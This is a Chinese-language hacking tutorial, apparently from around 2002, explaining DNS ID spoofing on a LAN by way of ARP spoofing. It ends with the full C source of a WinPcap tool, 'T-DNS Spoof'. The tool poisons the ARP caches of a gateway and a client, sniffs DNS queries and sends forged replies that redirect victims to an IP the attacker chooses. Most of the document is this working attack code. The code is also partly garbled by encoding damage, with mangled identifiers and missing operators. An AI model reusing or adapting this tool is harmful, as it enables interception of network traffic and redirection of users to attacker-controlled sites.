域名系統(tǒng)（DNS）是一種用于TCP/IP應(yīng)用程序的分布式數(shù)據(jù)庫(kù)，它提供主機(jī)名字和IP地址之間的轉(zhuǎn)換信息。通常，網(wǎng)絡(luò)用戶(hù)通過(guò)UDP協(xié)議和DNS服務(wù)器進(jìn)行通信，而服務(wù)器在特定的53 端口監(jiān)聽(tīng)，并返回用戶(hù)所需的相關(guān)信息。

一．DNS協(xié)議的相關(guān)數(shù)據(jù)結(jié)構(gòu)

DNS數(shù)據(jù)報(bào)：

typedef strUCt dns{　unsigned short id；　//標(biāo)識(shí)，通過(guò)它客戶(hù)端可以將DNS的請(qǐng)求與應(yīng)答相匹配；　unsigned short flags；　//標(biāo)志：[QR opcode AA TC RD RA zero rcode ]　unsigned short quests；　//問(wèn)題數(shù)目；　unsigned short answers；　//資源記錄數(shù)目；　unsigned short author；　//授權(quán)資源記錄數(shù)目；　unsigned short addition；　//額外資源記錄數(shù)目；}DNS,*PDNS；

在16位的標(biāo)志中：QR位判定是查詢(xún)/響應(yīng)報(bào)文，opcode區(qū)別查詢(xún)類(lèi)型，AA判定是否為授權(quán)回答，TC判定是否可截?cái)啵琑D判定是否期望遞歸查詢(xún)，RA判定是否為可用遞歸，zero必須為0，rcode為返回碼字段。

DNS查詢(xún)數(shù)據(jù)報(bào)：

typedef struct query{　unsinged char　*name；　//查詢(xún)的域名,這是一個(gè)大小在0到63之間的字符串；　unsigned short type；　//查詢(xún)類(lèi)型，大約有20個(gè)不同的類(lèi)型　unsigned short classes；　//查詢(xún)類(lèi),通常是A類(lèi)既查詢(xún)IP地址。}QUERY,*PQUERY；

DNS響應(yīng)數(shù)據(jù)報(bào)：typedef struct response{　unsigned short name； 　//查詢(xún)的域名　unsigned short type；　//查詢(xún)類(lèi)型　unsigned short classes；　//類(lèi)型碼　unsigned int　 ttl；　//生存時(shí)間　unsigned short length；　//資源數(shù)據(jù)長(zhǎng)度　unsigned int　 addr；　//資源數(shù)據(jù)}RESPONSE,*PRESPONSE；

二．Windows下DNS ID欺騙的原理

我們可以看到，在DNS數(shù)據(jù)報(bào)頭部的id（標(biāo)識(shí)）是用來(lái)匹配響應(yīng)和請(qǐng)求數(shù)據(jù)報(bào)的。現(xiàn)在，讓我們來(lái)看看域名解析的整個(gè)過(guò)程。客戶(hù)端首先以特定的標(biāo)識(shí)向DNS服務(wù)器發(fā)送域名查詢(xún)數(shù)據(jù)報(bào)，在DNS服務(wù)器查詢(xún)之后以相同的ID號(hào)給客戶(hù)端發(fā)送域名響應(yīng)數(shù)據(jù)報(bào)。這時(shí)客戶(hù)端會(huì)將收到的DNS響應(yīng)數(shù)據(jù)報(bào)的ID和自己發(fā)送的查詢(xún)數(shù)據(jù)報(bào)ID相比較，假如匹配則表明接收到的正是自己等待的數(shù)據(jù)報(bào)，假如不匹配則丟棄之。

假如我們能夠偽裝DNS服務(wù)器提前向客戶(hù)端發(fā)送響應(yīng)數(shù)據(jù)報(bào)，那么客戶(hù)端的DNS緩存里域名所對(duì)應(yīng)的IP就是我們自定義的IP了，同時(shí)客戶(hù)端也就被帶到了我們希望的網(wǎng)站。條件只有一個(gè)，那就是我們發(fā)送的ID匹配的DSN響應(yīng)數(shù)據(jù)報(bào)在DNS服務(wù)器發(fā)送的響應(yīng)數(shù)據(jù)報(bào)之前到達(dá)客戶(hù)端。下圖清楚的展現(xiàn)了DNS ID欺騙的過(guò)程：

Client ＜--response-- . . . . . .. . . . . . . . . . DNS Server＜--[a.b.c == 112.112.112.112]-- Your Computer

到此，我想大家都知道了DNS ID欺騙的實(shí)質(zhì)了，那么如何才能實(shí)現(xiàn)呢？這要分兩種情況：

1. 本地主機(jī)與DNS服務(wù)器，本地主機(jī)與客戶(hù)端主機(jī)均不在同一個(gè)局域網(wǎng)內(nèi),方法有以下幾種：向客戶(hù)端主機(jī)隨機(jī)發(fā)送大量DNS響應(yīng)數(shù)據(jù)報(bào)，命中率很低；向DNS服務(wù)器發(fā)起拒絕服務(wù)攻擊，太粗魯；BIND漏洞，使用范圍比較窄。

2. 本地主機(jī)至少與DNS服務(wù)器或客戶(hù)端主機(jī)中的某一臺(tái)處在同一個(gè)局域網(wǎng)內(nèi)：我們可以通過(guò)ARP欺騙來(lái)實(shí)現(xiàn)可靠而穩(wěn)定的DNS ID欺騙，下面我們將具體討論這種情況。首先我們進(jìn)行DNS ID欺騙的基礎(chǔ)是ARP欺騙，也就是在局域網(wǎng)內(nèi)同時(shí)欺騙網(wǎng)關(guān)和客戶(hù)端主機(jī)（也可能是欺騙網(wǎng)關(guān)和DNS服務(wù)器，或欺騙DNS服務(wù)器和客戶(hù)端主機(jī)）。我們以客戶(hù)端的名義向網(wǎng)關(guān)發(fā)送ARP響應(yīng)數(shù)據(jù)報(bào)，不過(guò)其中將源MAC地址改為我們自己主機(jī)的MAC地址；同時(shí)以網(wǎng)關(guān)的名義向客戶(hù)端主機(jī)發(fā)送ARP響應(yīng)數(shù)據(jù)報(bào)，同樣將源MAC地址改為我們自己主機(jī)的MAC地址。這樣以來(lái)，網(wǎng)關(guān)看來(lái)客戶(hù)端的MAC地址就是我們主機(jī)的MAC地址；客戶(hù)端也認(rèn)為網(wǎng)關(guān)的MAC地址為我們主機(jī)的MAC地址。由于在局域網(wǎng)內(nèi)數(shù)據(jù)報(bào)的傳送是建立在MAC地址之上了，所以網(wǎng)關(guān)和客戶(hù)端之間的數(shù)據(jù)流通必須先通過(guò)本地主機(jī)。

在監(jiān)視網(wǎng)關(guān)和客戶(hù)端主機(jī)之間的數(shù)據(jù)報(bào)時(shí)，假如發(fā)現(xiàn)了客戶(hù)端發(fā)送的DNS查詢(xún)數(shù)據(jù)報(bào)（目的端口為53），那么我們可以提前將自己構(gòu)造的DNS響應(yīng)數(shù)據(jù)報(bào)發(fā)送到客戶(hù)端。注重，我們必須提取有客戶(hù)端發(fā)送來(lái)的DNS查詢(xún)數(shù)據(jù)報(bào)的ID信息，因?yàn)榭蛻?hù)端是通過(guò)它來(lái)進(jìn)行匹配認(rèn)證的，這就是一個(gè)我們可以利用的DNS漏洞。這樣客戶(hù)端會(huì)先收到我們發(fā)送的DNS響應(yīng)數(shù)據(jù)報(bào)并訪問(wèn)我們自定義的網(wǎng)站，雖然客戶(hù)端也會(huì)收到DNS服務(wù)器的響應(yīng)報(bào)文，不過(guò)已經(jīng)來(lái)不及了，哈哈。

三．核心代碼分析

主程序創(chuàng)建兩個(gè)線程，一個(gè)線程進(jìn)行實(shí)時(shí)的ARP欺騙，另一個(gè)線程監(jiān)聽(tīng)接收到的數(shù)據(jù)報(bào)，若發(fā)現(xiàn)有域名服務(wù)查詢(xún)數(shù)據(jù)報(bào)，則立即向客戶(hù)端發(fā)送自定義的DSN響應(yīng)數(shù)據(jù)報(bào)。測(cè)試環(huán)境：Windows2000 + VC6.0 + Winpcap_3.0_alpha，注冊(cè)表：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersIPEnableRouter = 0x1。

1.sniff線程：PacketSetHwFilter（lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS）；//將網(wǎng)卡設(shè)置為混雜模式PacketSetBuff（lpadapter,500*1024）；//設(shè)置網(wǎng)絡(luò)適配器的內(nèi)核緩存；PacketSetReadTimeout（lpadapter,1）；//設(shè)置等待時(shí)間；PacketReceivePacket（lpadapter,lppacketr,TRUE）；//接收網(wǎng)絡(luò)數(shù)據(jù)報(bào)；checksum（（USHORT *）temp,sizeof（PSD）+sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）+sizeof（RESPONSE））；//計(jì)算校驗(yàn)和；PacketInitPacket（lppackets,sendbuf,sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen+4+sizeof（RESPONSE））；//初始化一個(gè)_PACKET結(jié)構(gòu)，發(fā)送DNS響應(yīng)數(shù)據(jù)報(bào)；

2.arpspoof線程；PacketInitPacket（lppackets,sendbuf,sizeof（eth）+sizeof（arp））；//初始化ARP響應(yīng)數(shù)據(jù)報(bào)；PacketSendPacket（lpadapter,lppackets,TRUE）；//發(fā)送ARP欺騙的響應(yīng)數(shù)據(jù)報(bào)；3.getmac（）函數(shù)GetAdaptersInfo（padapterinfo,&adapterinfosize）；//獲取網(wǎng)絡(luò)適配器的屬性；SendARP（destip,0,pulmac,&ullen）；//發(fā)送ARP請(qǐng)求數(shù)據(jù)報(bào)，過(guò)去網(wǎng)絡(luò)主機(jī)的MAC地址；4.main（）函數(shù)PacketGetAdapterNames（（char *）adaptername,&adapterlength）；//獲得本地主機(jī)的網(wǎng)絡(luò)適配器列表和描述；lpadapter=PacketOpenAdapter（adapterlist[open-1]）；　//打開(kāi)指定的網(wǎng)絡(luò)適配器；CreateThread（NULL,0,sniff,NULL,0,&threadrid）；CreateThread（NULL,0,arpspoof,NULL,0,&threadsid）；//創(chuàng)建兩個(gè)線程；WaitForMultipleObjects（2,thread,FALSE,INFINITE）；//等待其中的某個(gè)線程結(jié)束；

四．小結(jié)與后記

局域網(wǎng)內(nèi)的網(wǎng)絡(luò)安全是一個(gè)值得大家關(guān)注的問(wèn)題，往往輕易發(fā)起各種欺騙攻擊，這是局域網(wǎng)自身的屬性所決定的--網(wǎng)絡(luò)共享。本文所講解的DNS ID欺騙是基于ARP欺騙之上的網(wǎng)絡(luò)攻擊，假如在廣域網(wǎng)上，則比較麻煩。不過(guò)也有一些例外情況：假如IE中使用代理服務(wù)器，欺騙不能進(jìn)行，因?yàn)檫@時(shí)客戶(hù)端并不會(huì)在本地進(jìn)行域名請(qǐng)求；假如你訪問(wèn)的不是網(wǎng)站主頁(yè)，而是相關(guān)子目錄的文件，這樣你在自定義的網(wǎng)站上不會(huì)找到相關(guān)的文件，登陸以失敗告終。假如你不幸被欺騙了，先禁用本地連接，然后啟用本地連接就可以清除DNS緩存。

五．附件源代碼

#include ＜packet32.h＞#include ＜iphlpapi.h＞#include ＜stdio.h＞

#define ETH_IP　 0x0800#define ETH_ARP　0x0806#define ARP_REQUEST　0x0001#define ARP_REPLY0x0002#define ARP_HARDWARE 0x0001#define MAX_NUM_ADAPTER　10#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020

#pragma pack（push,1）

typedef struct ethdr{unsigned char　eh_dst[6]；unsigned char　eh_src[6]；unsigned short eh_type；}ETHDR,*PETHDR；

typedef struct arphdr{unsigned short　arp_hdr；unsigned short　arp_pro；unsigned char　 arp_hln；unsigned char　 arp_pln；unsigned short　arp_opt；unsigned char　 arp_sha[6]；unsigned long　 arp_spa；unsigned char　 arp_tha[6]；unsigned long　 arp_tpa；}ARPHDR,*PARPHDR；

typedef struct iphdr{unsigned char　h_lenver；unsigned char　tos；unsigned short total_len；unsigned short ident；unsigned short frag_and_flags；unsigned char　ttl；unsigned char　protocol；unsigned short checksum；unsigned int　 sourceip；unsigned int　 destip；}IPHDR,*PIPHDR；

typedef struct psd{unsigned int　 saddr；unsigned int　 daddr；char　 mbz；char　 ptcl；unsigned short udpl；}PSD,*PPSD；

typedef struct udphdr{unsigned short souceport；unsigned short destport；unsigned short length；unsigned short checksum；}UDPHDR,*PUDPHDR；

typedef struct dns{unsigned short id；unsigned short flags；unsigned short quests；unsigned short answers；unsigned short author；unsigned short addition；}DNS,*PDNS；

typedef struct query{unsigned short type；unsigned short classes；}QUERY,*PQUERY；typedef struct response{unsigned short name； unsigned short type；unsigned short classes；unsigned int　 ttl；unsigned short length；unsigned int　 addr；}RESPONSE,*PRESPONSE；

#pragma pack（pop）

unsigned short checksum（USHORT *buffer,int size）{unsigned long cksum=0；while（size＞1）{cksum+=*buffer++；size-=sizeof（unsigned short）；}if（size）cksum+=*buffer；cksum=（cksum＞＞16）+（cksum & 0xffff）；cksum+=（cksum＞＞16）；return （unsigned short）（~cksum）；}

LPADAPTER lpadapter=0；LPPACKET　lppacketr,lppackets；IPAddrmyip,firstip,secondip,virtualip；UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0}；char　adapterlist[MAX_NUM_ADAPTER][1024]；

void start（）{printf（'===[ T-DNS Spoof, by TOo2y　 ]===n'）；printf（'===[ TOo2y@safechina.net ]===n'）；printf（'===[ Homepage: www.safechina.net ]===n'）；printf（'===[ Date: 10-15-2002]===nn'）；return；}

void usage（）{printf（'Usage:　T-DNS　Firstip　Secondip　Virtualipn'）；return；}

DWord WINAPI sniff（LPVOID no）{printf（'nI am sniffing...n'）；　

char *buf；char *pchar；char temp[1024]；char sendbuf[1024]；char recvbuf[1024*250]；struct　 bpf_hdr *hdr；unsigned char*dname；　 unsigned longulbytesreceived,off,ulen；

ETHDRethr,eths；IPHDRipr,ips；PSD　psds； UDPHDR　 udpr,udps；DNS　dnsr,dnss； QUERYqueryr,querys；RESPONSE responses；if（PacketSetHwFilter（lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS）==FALSE）{printf（'Warning: Unable to set the adapter to promiscuous mode!n'）；}

if（PacketSetBuff（lpadapter,500*1024）==FALSE）{printf（'PacketSetBuff Error: %dn',GetLastError（））；return -1；}

if（PacketSetReadTimeout（lpadapter,1）==FALSE）{printf（'Warning: Unable to set the timeout!n'）；}

if（（lppacketr=PacketAllocatePacket（））==FALSE）{printf（'PacketAllocatePacket Receive Error: %dn',GetLastError（））；return -1；}

PacketInitPacket（lppacketr,（char *）recvbuf,sizeof（recvbuf））；

while（1）{if（PacketReceivePacket（lpadapter,lppacketr,TRUE）==FALSE）{　break；　 }

ulbytesreceived=lppacketr-＞ulBytesReceived；buf=（char *）lppacketr-＞Buffer；off=0；

while（off＜ulbytesreceived）{ hdr=（struct bpf_hdr *）（buf+off）；off+=hdr-＞bh_hdrlen；　 pchar=（char *）（buf+off）；off=Packet_WORDALIGN（off+hdr-＞bh_caplen）；

ethr=*（ETHDR *）pchar； if（ethr.eh_type==htons（ETH_IP））{ ipr=*（IPHDR *）（pchar+sizeof（ETHDR））；if（ipr.protocol!=17）{ continue；}if（（ipr.sourceip!=secondip） && （ipr.sourceip!=firstip））{continue；}

udpr=*（UDPHDR *）（pchar+sizeof（ETHDR）+sizeof（IPHDR））；ulen=ntohs（udpr.length）-sizeof（UDPHDR）-sizeof（DNS）-sizeof（QUERY）； dname=（unsigned char *）malloc（ulen*sizeof（unsigned char））；if（udpr.destport==htons（53）） {printf（'Get a DNS Packet...t'）；　

memset（sendbuf,0,sizeof（sendbuf））；memcpy（&dnsr,pchar+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）,sizeof（DNS））；memcpy（dname,pchar+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）,ulen）；memcpy（&queryr.type,pchar+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen,2）； memcpy（&queryr.classes,pchar+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen+2,2）；

responses.name=htons（0xC00C）；　responses.type=queryr.type；responses.classes=queryr.classes； responses.ttl=0xFFFFFFFF；responses.length=htons（4）；responses.addr=virtualip；

querys.classes=queryr.classes；　 querys.type=queryr.type；

dnss.id=dnsr.id；dnss.flags=htons（0x8180）；　dnss.quests=htons（1）；dnss.answers=htons（1）；dnss.author=0；dnss.addition=0；

udps.souceport=udpr.destport；udps.destport=udpr.souceport；udps.length=htons（sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）+sizeof（RESPONSE））；udps.checksum=0；　ips.h_lenver=（4＜＜4sizeof（IPHDR）/sizeof（unsigned int））；ips.tos=0；ips.total_len=ntohs（sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）+sizeof（RESPONSE））；ips.ident=htons（12345）；ips.frag_and_flags=0；ips.ttl=255；ips.protocol=IPPROTO_UDP；ips.checksum=0； ips.sourceip=ipr.destip；ips.destip=ipr.sourceip；

psds.saddr=ips.sourceip；psds.daddr=ips.destip；psds.mbz=0； psds.ptcl=IPPROTO_UDP；psds.udpl=htons（sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）+sizeof（RESPONSE））；

memset（temp,0,sizeof（temp））；memcpy（temp,&psds,sizeof（PSD））；memcpy（temp+sizeof（PSD）,&udps,sizeof（UDPHDR））；memcpy（temp+sizeof（PSD）+sizeof（UDPHDR）,&dnss,sizeof（DNS））；memcpy（temp+sizeof（PSD）+sizeof（UDPHDR）+sizeof（DNS）,dname,ulen）；memcpy（temp+sizeof（PSD）+sizeof（UDPHDR）+sizeof（DNS）+ulen,&querys,sizeof（QUERY））；memcpy（temp+sizeof（PSD）+sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）,&responses,sizeof（RESPONSE））；udps.checksum=checksum（（USHORT *）temp,sizeof（PSD）+sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）+sizeof（RESPONSE））； memset（temp,0,sizeof（temp））；memcpy（temp,&ips,sizeof（IPHDR））；ips.checksum=checksum（（USHORT *）temp,sizeof（IPHDR））；

eths.eh_type=ethr.eh_type；memcpy（ðs.eh_src,ðr.eh_dst,6）；memcpy（ðs.eh_dst,ðr.eh_src,6）；

memcpy（sendbuf,ðs,sizeof（ETHDR））；memcpy（sendbuf+sizeof（ETHDR）,&ips,sizeof（IPHDR））；memcpy（sendbuf+sizeof（ETHDR）+sizeof（IPHDR）,&udps,sizeof（UDPHDR））；memcpy（sendbuf+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）,&dnss,sizeof（DNS））；memcpy（sendbuf+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）,dname,ulen）；memcpy（sendbuf+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen,&querys,sizeof（QUERY））；memcpy（sendbuf+sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen+sizeof（QUERY）,&responses,sizeof（RESPONSE））；

PacketInitPacket（lppackets,sendbuf,sizeof（ETHDR）+sizeof（IPHDR）+sizeof（UDPHDR）+sizeof（DNS）+ulen+4+sizeof（RESPONSE））；　 if（PacketSendPacket（lpadapter,lppackets,TRUE）==FALSE）{printf（'PacketSendPacket in DNS Spoof Error: %dn',GetLastError（））；　 break；} printf（'Send DNS Spoof Packet Successfully!n'）；}}}}return 0；}

DWORD WINAPI arpspoof（LPVOID no）{printf（'I am arpspoofing...nn'）；

char　 sendbuf[1024]；struct sockaddr_in fsin,ssin；ETHDR　eth；ARPHDR arp；

fsin.sin_addr.s_addr=firstip；ssin.sin_addr.s_addr=secondip；

eth.eh_type=htons（ETH_ARP）；arp.arp_hdr=htons（ARP_HARDWARE）； arp.arp_pro=htons（ETH_IP）；arp.arp_hln=6；arp.arp_pln=4；arp.arp_opt=htons（ARP_REPLY）；

do{memcpy（eth.eh_dst,fmac,6）；memcpy（arp.arp_tha,fmac,6）；arp.arp_tpa=firstip；arp.arp_spa=secondip；memcpy（eth.eh_src,mmac,6）；memcpy（arp.arp_sha,mmac,6）；

memset（sendbuf,0,sizeof（sendbuf））；memcpy（sendbuf,ð,sizeof（eth））；memcpy（sendbuf+sizeof（eth）,&arp,sizeof（arp））；

PacketInitPacket（lppackets,sendbuf,sizeof（eth）+sizeof（arp））；if（PacketSendPacket（lpadapter,lppackets,TRUE）==FALSE）{printf（'PacketSendPacket in arpspoof Error: %dn',GetLastError（））；return -1；}Sleep（500）；

memcpy（eth.eh_dst,smac,6）；memcpy（arp.arp_tha,smac,6）；arp.arp_tpa=secondip；arp.arp_spa=firstip；memcpy（eth.eh_src,mmac,6）；memcpy（arp.arp_sha,mmac,6）；

memset（sendbuf,0,sizeof（sendbuf））；memcpy（sendbuf,ð,sizeof（eth））；memcpy（sendbuf+sizeof（eth）,&arp,sizeof（arp））；

PacketInitPacket（lppackets,sendbuf,sizeof（eth）+sizeof（arp））；if（PacketSendPacket（lpadapter,lppackets,TRUE）==FALSE）{printf（'PacketSendPacket in arpspoof Error: %dn',GetLastError（））；return -1；}Sleep（500）；}while（1）；return 0；}

BOOL getmac（）{HRESULT　hr；IPAddr　 destip；ULONGpulmac[2]；ULONGullen；

DWORD err；DWORD fixedinfosize=0；DWORD adapterinfosize=0；PIP_ADAPTER_INFO　padapterinfo；PIP_ADDR_STRING　 paddrstr；

if（（err=GetAdaptersInfo（NULL,&adapterinfosize））!=0）{if（err!=ERROR_BUFFER_OVERFLOW）{printf（'GetAdapterInfo size Error: %dn',GetLastError（））；return FALSE；}}

if（（padapterinfo=（PIP_ADAPTER_INFO）GlobalAlloc（GPTR,adapterinfosize））==NULL）{printf（'Memory allocation Error: %dn',GetLastError（））；return FALSE；}

if（（err=GetAdaptersInfo（padapterinfo,&adapterinfosize））!=0）{printf（'GetAdaptersInfo Error: %dn',GetLastError（））；return FALSE；}

memcpy（mmac,padapterinfo-＞Address,6）；　paddrstr=&（padapterinfo-＞IpAddressList）；myip=inet_addr（paddrstr-＞IpAddress.String）；

ullen=6；memset（pulmac,0xff,sizeof（pulmac））；destip=firstip；if（（hr=SendARP（destip,0,pulmac,&ullen））!=NO_ERROR）{printf（'SendARP firstip Error: %dn',GetLastError（））；return FALSE；}memcpy（fmac,pulmac,6）；

memset（pulmac,0xff,sizeof（pulmac））；destip=secondip；if（（hr=SendARP（destip,0,pulmac,&ullen））!=NO_ERROR）{printf（'SendARP secondip Error: %dn',GetLastError（））；return FALSE；}memcpy（smac,pulmac,6）；

return TRUE；}

int main（int argc,char *argv[]）{HANDLE　 thread[2]；WCHARadaptername[8192]；WCHAR*name1,*name2；ULONGadapterlength；DWORDthreadsid,threadrid；int　adapternum=0,open,i；

system（'cls.exe'）；start（）；if（argc!=4）{usage（）；return -1；}

firstip=inet_addr（argv[1]）；secondip=inet_addr（argv[2]）；virtualip=inet_addr（argv[3]）；if（getmac（）==FALSE）{return -1；}

adapterlength=sizeof（adaptername）；

if（PacketGetAdapterNames（（char *）adaptername,&adapterlength）==FALSE）{printf（'PacketGetAdapterNames Error: %dn',GetLastError（））；return -1；}

name1=adaptername；name2=adaptername；i=0；

while（（*name1!=''） （*（name1-1）!=''））{if（*name1==''）{memcpy（adapterlist[i],name2,2*（name1-name2））；name2=name1+1；i++；}name1++；}

adapternum=i；printf（'Adapters Installed: n'）；for（i=0；i＜adapternum；i++）{wprintf（L'%d - %sn',i+1,adapterlist[i]）；　 }do{printf（'nSelect the number of the adapter to open: '）；scanf（'%d',&open）；if（open＞=1 && open＜=adapternum）break；}while（open＜1 open＞adapternum）；

lpadapter=PacketOpenAdapter（adapterlist[open-1]）；if（!lpadapter （lpadapter-＞hFile==INVALID_HANDLE_VALUE））{printf（'PacketOpenAdapter Error: %dn',GetLastError（））；return -1；}

if（（lppackets=PacketAllocatePacket（））==FALSE）{printf（'PacketAllocatePacket Send Error: %dn',GetLastError（））；return -1；}

thread[0]=CreateThread（NULL,0,sniff,NULL,0,&threadrid）；if（thread[0]==NULL）{printf（'CreateThread for sniffer Error: %dn',GetLastError（））；return -1；}thread[1]=CreateThread（NULL,0,arpspoof,NULL,0,&threadsid）；if（thread[1]==NULL）{printf（'CreateThread for arpspoof Error: %dn',GetLastError（））；return -1；}WaitForMultipleObjects（2,thread,FALSE,INFINITE）；

CloseHandle（thread[0]）；CloseHandle（thread[1]）；PacketFreePacket（lppackets）；PacketFreePacket（lppacketr）；PacketCloseAdapter（lpadapter）；

return 0；}